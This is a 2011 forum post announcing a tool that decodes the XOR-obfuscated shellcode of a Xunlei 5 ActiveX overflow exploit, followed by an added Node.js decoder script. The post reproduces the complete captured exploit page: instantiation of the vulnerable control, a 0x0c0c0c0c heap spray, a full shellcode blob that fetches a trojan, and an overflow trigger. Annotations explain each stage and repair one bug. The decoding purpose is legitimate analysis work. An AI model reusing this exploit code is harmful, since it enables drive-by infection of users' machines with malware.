Posted on 2011-8-5 08:20:29
Last edited by 灰儿 on 2011-8-5 10:29

Software name: ASCII <-> unescape converter (ASCII码与unescape相互转换器)
Release date: 22 November 2007
E-mail: coderui@163.com
Website: http://hi.baidu.com/coderui
Highlight: decodes the XOR-obfuscated SHELLCODE of the Xunlei 5 (0-day) overflow exploit
---------------------------------------------------------------------------------------
Brief description:
  A new vulnerability has recently appeared online, the "Xunlei 5 (0-day) overflow vulnerability, CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F". Someone has presumably already released a tool that generates SHELLCODE for it; the code captured from that tool's output is reproduced below. After decoding it with the unescape method we found that no trojan download address was visible, because the assembly code that unescape yields carries an additional XOR layer. The [unescape -> ASCII (XOR)] function of this program, ASCII码与unescape相互转换器, decodes the whole XOR-obfuscated payload directly and, in doing so, also shows the trojan's download address in plaintext.

  I am designing a very handy script decoding tool. Since there is currently no tool online for decoding the XOR-obfuscated SHELLCODE of this "Xunlei 5 overflow vulnerability", I am releasing this decoding module early in the hope that it is useful to everyone. The program's algorithm is not very mature and is still in development and testing; it will be updated gradually. If you have SHELLCODE that it fails to decode, send it to me at coderui@163.com and I will upgrade the program as soon as I have analysed it.

Function modules:
ASCII -> unescape         Note: converts ASCII to unescape notation.
unescape -> ASCII         Note: converts unescape notation to ASCII.
unescape -> hex           Note: converts unescape notation to hexadecimal.
hex -> unescape           Note: converts hexadecimal to unescape notation.
unescape -> ASCII (XOR)   Note: specifically decodes the XOR-obfuscated unescape SHELLCODE of the "Xunlei 5 (0-day) overflow vulnerability, CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F".
Hex XOR calculator        Note: if the XOR scheme in the assembly code obtained from the unescape payload has changed, combine the [unescape -> hex] and [hex XOR calculator] functions to analyse and decode it by hand.


---------------------------------------------------------------------------------------
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<SCRIPT language="JavaScript">
// Fire only once per browser: a cookie marks the visit.
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
var set_cookie = document.cookie.indexOf("3Ware=");
if (set_cookie == -1){document.cookie = "3Ware=1;expires=" + expires.toGMTString();
// Instantiate the vulnerable Xunlei 5 ActiveX control.
document.write('<object id="gl" classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F"></object>');
// Address the heap spray must cover; the overflow below fills memory with 0x0c bytes,
// so any pointer it clobbers becomes 0x0c0c0c0c and lands in the sprayed region.
var helloworld2Address = 0x0c0c0c0c;
// XOR-obfuscated shellcode with its decoder stub (key 0xFE) in front.
var shellcode = unescape("%u10eb%u4b5b%uc933%ub966%u029b%u3480%ufe0b%ufae2%u05eb%uebe8%uffff%u17ff%ufcc4%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7f9%u2416%ufeff%u1cfe%ube07%uc67e%u8b3d%u7704%udab8%u9196%ufe90%u96fe%u8c8b%u9392%u94aa%ua7ff%uf875%u5e16%ufeff%u6bfe%u4a16%ufeff%u73fe%uc940%ufeff%ua9fe%u0196%ufefe%u01fe%ufaa8%u39fd%ufe39%u80a2%ud080%ube39%u9bfa%u9b86%ua9fe%ua801%ucdf6%uad25%ua9ad%ub873%uaec6%u01ad%ue2a8%u9294%u9096%u9a8a%uaa92%uff94%u75a7%u16f8%uffa7%ufefe%u1675%ubefd%u75c2%ue2b6%u8675%ufdd2%u9a03%ueb75%ufece%ufefe%u6c75%ufe56%ufefe%u0f96%udbb3%u962b%ub30f%u2bdb%u3796%ua0ac%u01ad%u6aca%ub871%u39d6%ud2b8%u7fb3%uefce%u4696%ufecc%u96fe%uce46%ufefe%u4696%ufed7%u75fe%u6afa%ub99e%uf9c7%ufc8a%u071c%u8077%u9fce%u4696%uffe1%u96fe%ueb46%ufeff%u4696%ufe0e%u75fe%u6afa%uc7b9%u8af9%u1cfc%u7707%uca80%ufe94%u9b96%ucd92%u96cc%u9b95%u908c%u94aa%ua7ff%uf875%u2c16%ufefe%u75fe%ufd26%uc2be%u3e7d%u75e6%u9686%u05fd%u817d%ufeee%u8b8a%ub175%ufdf2%u7f35%u90c7%u9a8a%u8b92%u759d%ufdd1%u7d15%ufe83%u8afe%u75a7%ufebb%uba73%ufce6%u37cd%u40f1%uc4ee%u8a28%u3ff6%uf937%u34fd%u15be%uc50f%ud6b0%ue48b%ud59e%ufdd1%uee91%uaaae%ufa94%ufa94%u01ab%ue6a8%u01a6%uce88%ubb71%u9ffe%ue315%ub0c5%u8bd2%u9ee6%ud1d5%u91fd%uaeee%u94aa%u94fa%uabfa%ua801%ua6e6%u8801%u71ca%ufebb%u7d9f%ufa3b%u5f15%u397d%u15ea%u757b%uea80%u94aa%u94fa%ua981%ua801%u39e6%u96f9%uf4f6%ucdfe%u763e%ufab9%u0275%uec94%u55a7%u031c%u3998%udaba%uffc2%u75ff%u7302%ueeb9%uaea9%uafaf%uafaf%uafaf%u73af%uc978%ufeff%uaefe%ua801%u7ff2%u763a%ufeff%u3cfe%ufede%ua801%u75ee%udaa8%ua5bf%ufdac%ufd1f%ufd1f%ufd1f%u7d1f%ufa12%uada4%u2475%u091c%u01ac%uaf1e%u75a8%uc28b%u8a75%u86d0%u0bfd%u75a8%ude88%u0bfd%u37cd%ubfb7%ufd53%ucd3b%uf125%uee40%u28c4%uf68a%u353f%ufdf9%ube24%u0f15%ue1c5%u198b%u75a0%udaa0%u23fd%u7598%ub5f2%ua075%ufde2%u7523%u75fa%u3bfd%ua055%u3da7%u3f16%u0103%ucc01%u6f8a%uc7f2%u831c%u877d%u18c7%u3766%u5842%u9d95%u2f77%u0eb1%u85b6%ue0c3%u9a5a%u7e11%u5128%ub364%uce7f%ufeef%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%u96fe%u8a8a%uc48e%ud1d1%u8989%ud089%ucd89%ud39d%u8c91%ud099%u919d%ud193%ucd89%ud09d%u869b%ufe9b");
// Heap spray: 1 MB blocks, each a slide of 0x0c0c0c0c followed by the shellcode.
// String lengths are in 16-bit units, hence the *2 and /2 below; 0x38 leaves room for string headers.
var hbshelloworld = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = hbshelloworld - (payLoadSize+0x38);
var spraySlide = unescape("%u0c0c%u0c0c");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
      memory[i] = spraySlide + shellcode;   // each block needs its own slot; the captured copy had dropped the [i]
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
      spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
// Trigger: an over-long FlvPlayerUrl made of 0x0c bytes overflows the control's buffer.
var size_buff = 1070;
var x = unescape("%0c%0c%0c%0c");
while (x.length<size_buff) x += x;
gl.FlvPlayerUrl = x;
}
</SCRIPT>
<script>
if (set_cookie == -1){
location.reload();
}
</script>
---------------------------------------------------------------------------------------
[Screenshot: Hex XOR calculator]

[Screenshot: ASCII <-> unescape converter]
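As an added example (not part of the original post and not coderui's tool), here is a small Node.js script that does what the [unescape -> ASCII (XOR)] function does for this sample: it turns the %u-encoded string into the bytes it occupies in memory, reads the XOR key and byte count out of the decoder stub that precedes the payload instead of hard-coding them, XORs the payload, and lists the printable strings. The sample string is constructed from the page's own shellcode (the decoder stub, i.e. the first 12 %u tokens, joined directly to the last 16 tokens), so it only decodes the tail; the function names are mine.

```javascript
// Added example: decode the XOR-obfuscated shellcode shown above.
// unescape("%u10eb") is one UTF-16 code unit, stored little-endian in memory: EB 10.

// Convert a %uXXXX / %XX string to the byte sequence it occupies in memory.
function unescapeToBytes(s) {
  const out = [];
  const clean = s.replace(/\s+/g, "");        // the page's copy is broken across lines
  const re = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|([\s\S])/g;
  let m;
  while ((m = re.exec(clean)) !== null) {
    if (m[1] !== undefined) {
      const v = parseInt(m[1], 16);
      out.push(v & 0xff, v >>> 8);            // low byte first
    } else if (m[2] !== undefined) {
      out.push(parseInt(m[2], 16));
    } else {
      out.push(m[3].charCodeAt(0) & 0xff);    // plain ASCII character
    }
  }
  return Uint8Array.from(out);
}

// The stub in front of the payload, as it appears in the page's shellcode:
//   EB 10             jmp  +0x10
//   5B                pop  ebx                  ; ebx = address after the call
//   4B                dec  ebx
//   33 C9             xor  ecx, ecx
//   66 B9 9B 02       mov  cx, 0x29B            ; byte count
//   80 34 0B FE       xor  byte [ebx+ecx], 0xFE ; key
//   E2 FA             loop
//   EB 05             jmp  to decoded payload
//   E8 EB FF FF FF    call pop-ebx
// Returns {key, count, start}; start is the offset of the first encoded byte.
function parseDecoderStub(bytes) {
  let key = null, count = null, start = null;
  for (let i = 0; i + 3 < bytes.length && start === null; i++) {
    if (bytes[i] === 0x66 && bytes[i + 1] === 0xb9) {            // mov cx, imm16
      count = bytes[i + 2] | (bytes[i + 3] << 8);
    } else if (bytes[i] === 0x80 && bytes[i + 1] === 0x34) {     // xor byte [base+index], imm8
      key = bytes[i + 3];
    } else if (bytes[i] === 0xe8 && i + 4 < bytes.length && (bytes[i + 4] & 0x80)) {
      start = i + 5;                                             // call with negative rel32: payload follows it
    }
  }
  if (key === null || count === null || start === null) {
    throw new Error("decoder stub not recognised; fall back to the manual hex XOR route");
  }
  return { key, count, start };
}

function decodeXorPayload(bytes) {
  const { key, count, start } = parseDecoderStub(bytes);
  const n = Math.min(count, bytes.length - start);   // an excerpt may hold fewer bytes than the stub's count
  const out = new Uint8Array(n);
  for (let i = 0; i < n; i++) out[i] = bytes[start + i] ^ key;
  return out;
}

// Pull runs of printable ASCII of at least minLen characters, like `strings`.
function printableStrings(bytes, minLen = 5) {
  const found = [];
  let cur = "";
  for (const b of bytes) {
    if (b >= 0x20 && b <= 0x7e) { cur += String.fromCharCode(b); continue; }
    if (cur.length >= minLen) found.push(cur);
    cur = "";
  }
  if (cur.length >= minLen) found.push(cur);
  return found;
}

// Constructed sample: decoder stub (first 12 tokens of the page's shellcode)
// joined to its last 16 tokens; the middle of the payload is left out.
const SAMPLE =
  "%u10eb%u4b5b%uc933%ub966%u029b%u3480%ufe0b%ufae2%u05eb%uebe8%uffff%u17ff" +
  "%u96fe%u8a8a%uc48e%ud1d1%u8989%ud089%ucd89%ud39d%u8c91%ud099%u919d%ud193%ucd89%ud09d%u869b%ufe9b";

function analyse(unescapeText) {
  const bytes = unescapeToBytes(unescapeText);
  return { stub: parseDecoderStub(bytes), strings: printableStrings(decodeXorPayload(bytes)) };
}

if (typeof require !== "undefined" && require.main === module) {
  const r = analyse(SAMPLE);
  console.log(`key=0x${r.stub.key.toString(16)} count=${r.stub.count} start=${r.stub.start}`);
  console.log(r.strings);
}
```

Run it with `node`: it reports key 0xfe, a count of 0x29b bytes and payload offset 23, and the decoded tail contains the download URL the post refers to. If a later build of the generator changes the decoder (different key, different loop), `parseDecoderStub` throws rather than guessing, which is exactly the situation the post's hex XOR calculator is meant for.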